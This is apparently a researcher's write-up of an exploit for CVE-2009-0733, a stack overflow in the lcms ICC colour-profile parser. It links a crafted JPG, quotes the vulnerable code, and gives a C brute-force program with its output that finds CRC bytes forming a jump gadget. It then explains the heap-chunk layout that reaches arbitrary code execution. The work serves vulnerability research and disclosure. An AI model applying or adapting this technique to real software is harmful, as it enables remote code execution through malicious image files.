Here's the sample JPG file with an embedded evil ICC profile: http://cevans-app.appspot.com/static/CVE-2009-0733.jpg
I'm only bothering to write about this because the story behind the exploit contains a few interesting twists which illustrate the iterative constraint solving used in modern exploits:
- The underlying code flaw is a stack-based buffer overflow. But the data going past the bounds is not arbitrarily user-controlled. (If it were, a traditional stack smashing exploit would work, although ASLR could affect its reliability.) Here's the faulty code in cmsio1.c, where nCurves can end up greater than MAXCHANNELS:
static
LCMSBOOL ReadSetOfCurves(LPLCMSICCPROFILE Icc, size_t Offset, LPLUT NewLUT, int nLocation)
{
    LPGAMMATABLE Curves[MAXCHANNELS];
    ...
    for (i=0; i < nCurves; i++) {
        Curves[i] = ReadCurve(Icc);
        ...
- The data going past the bounds is actually pointers to heap chunks (returned by ReadCurve). This is nice because it takes ASLR out of the equation. We'll automatically overwrite %eip with a pointer to a valid heap address. But what is in that heap chunk? If it were arbitrary user-controlled data, we'd have game over already, but unfortunately it is not. We're looking at pointers to this structure:
struct GAMMATABLE {
    unsigned int Crc32;
    int Type;
    double Params[10];
    int nEntries;
    WORD GammaTable[1];
}
- There are two types of constructs in the input ICC profile used as a basis to populate this structure: curv and para. curv is of little use to us because it mostly leaves Crc32 set to 0 (or set based only on 16 bits of input entropy). Trying to execute the code 0x00 0x00 is a crash because it dereferences the %eax register: add %al,(%eax), and the value of this register is left as 0 or 1 to denote success or failure when the ReadSetOfCurves function exits.
- This leaves us looking at a para curve, which calculates Crc32 based very indirectly on some input variables under our control. Although we can't reverse it, we can brute force it with a little program:
#include <stdio.h>
#include <stdlib.h>
#include "lcms.h"

/* Reverse the byte order of a 32-bit value in place. */
static
void AdjustEndianess32(LPBYTE pByte)
{
    BYTE temp1;
    BYTE temp2;

    temp1 = *pByte++;
    temp2 = *pByte++;
    *(pByte-1) = *pByte;
    *pByte++ = temp2;
    *(pByte-3) = *pByte;
    *pByte = temp1;
}

/* Convert an s15Fixed16 value, as read raw from the file, to a double. */
static
double Convert15Fixed16(icS15Fixed16Number fix32)
{
    double floater, sign, mid, hack;
    int Whole, FracPart;

    AdjustEndianess32((LPBYTE) &fix32);
    sign = (fix32 < 0 ? -1 : 1);
    fix32 = abs(fix32);
    Whole = LOWORD(fix32 >> 16);
    FracPart = LOWORD(fix32 & 0x0000ffffL);
    hack = 65536.0;
    mid = (double) FracPart / hack;
    floater = (double) Whole + mid;
    return sign * floater;
}

int
main(int argc, const char* argv[]) {
    unsigned int crc;
    unsigned char* p_crc;
    double params[10] = { 0 };
    int type = 0;
    unsigned int i;
    unsigned int start;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <start>\n", argv[0]);
        return 1;
    }
    /* strtoul rather than atoi: start values above INT_MAX must survive. */
    start = (unsigned int) strtoul(argv[1], NULL, 10);

    for (i = start; ; ++i) {
        if ((i % 10000) == 0) {
            printf("progress: %u\n", i);
        }
        params[0] = Convert15Fixed16(i);
        LPGAMMATABLE table = cmsBuildParametricGamma(4096, type + 1, params);
        crc = table->Seed.Crc32;
        p_crc = (unsigned char*) &crc;
        /* Want xchg %eax,%ebx / %ebp / %edi, followed by jmp *%esi. */
        if ((p_crc[0] == 0x93 || p_crc[0] == 0x95 || p_crc[0] == 0x97) &&
            p_crc[1] == 0xff &&
            p_crc[2] == 0xe6) {
            printf("got it!!!!!!! %u %u\n", i, p_crc[0]);
            return 0;
        }
        cmsFreeGamma(table);
        /* "i <= 0xffffffff" is always true for an unsigned int, so stop explicitly. */
        if (i == 0xffffffffu) {
            break;
        }
    }
    return 1;
}
- What does this program do? Let's see:
chris@chris-desktop:~/progs$ ./a.out 3221970952
got it!!!!!!! 3221970952 151
This is telling us that a para curve of type 0 whose 4 input bytes are 3221970952 == 0xC00B6008 will result in 0x97 0xff 0xe6 0x?? being written to Crc32. We don't care about the last byte. This assembles to xchg %eax,%edi; jmp *%esi, which will execute because %eip jumps to this para heap chunk, which starts with the CRC. It is essential to do something useful in 4 bytes or fewer because we have terrible control over the rest of the content of this heap chunk. What these 3 bytes do is overwrite %eax with %edi, then jump to %esi. The significance here is that both registers we used were under our control because they were also restored from the stack we trashed with pointers to valid heap chunks.
- So execution continues at the curve heap chunk pointed to by %esi. We arrange for this to be a curv type chunk. Earlier we dismissed them as useless because the 0 Crc32 will result in a dereference of %eax. But now, thanks to our para chunk, we've repaired %eax to point to a valid heap chunk! Unlike para chunks, curv chunks do contain arbitrary data we can supply, after a mostly-zero header. We've essentially used the control at the beginning of a para chunk to repair %eax and use the vast control at the end of a curv chunk. Before our arbitrary code executes, a bunch of now harmless 0x00 0x00 will execute, writing some junk at the start of one of our unused heap chunks. Finally, just before our arbitrary code, the value of nEntries in the header will be executed. This value is 0x02 0x00 0x00 0x00, which is add (%eax),%al; add %al,(%eax). This trashes %eax a little bit before dereferencing it again, but by less than 256 bytes since only %al changes, so we're good, and we could always use a different number of entries in our curv chunk. Certainly, a real payload would need more than 2 words.
- The actual arbitrary code that executes is 0xeb 0xfe, which is equivalent to for (;;); in C. Look out for an endian-reversed instance of those two bytes, as well as an endian-reversed 0xC00B6008, in the exploit file.
- There's one further twist in the exploit relating to stack alignment. Some compiler optimizations leave no space between the end of the Curves array and the start of the saved registers. Other cases have a 4-byte gap. The exploit caters for both stack layouts by careful layout of curv vs. para chunks. Here's a simple illustrative table:
Curve in input file         Hit if 0 gap   Hit if 4-byte gap
17: blank curv              ebp            4-byte gap
18: curv payload            esi            ebp
19: curv payload            edi            esi
20: blank curv              ebx            edi
21: para redirect payload   eip            ebx
22: para redirect payload   eip + 4        eip
As can be seen, %eip always gets the para payload and %esi always gets the real payload.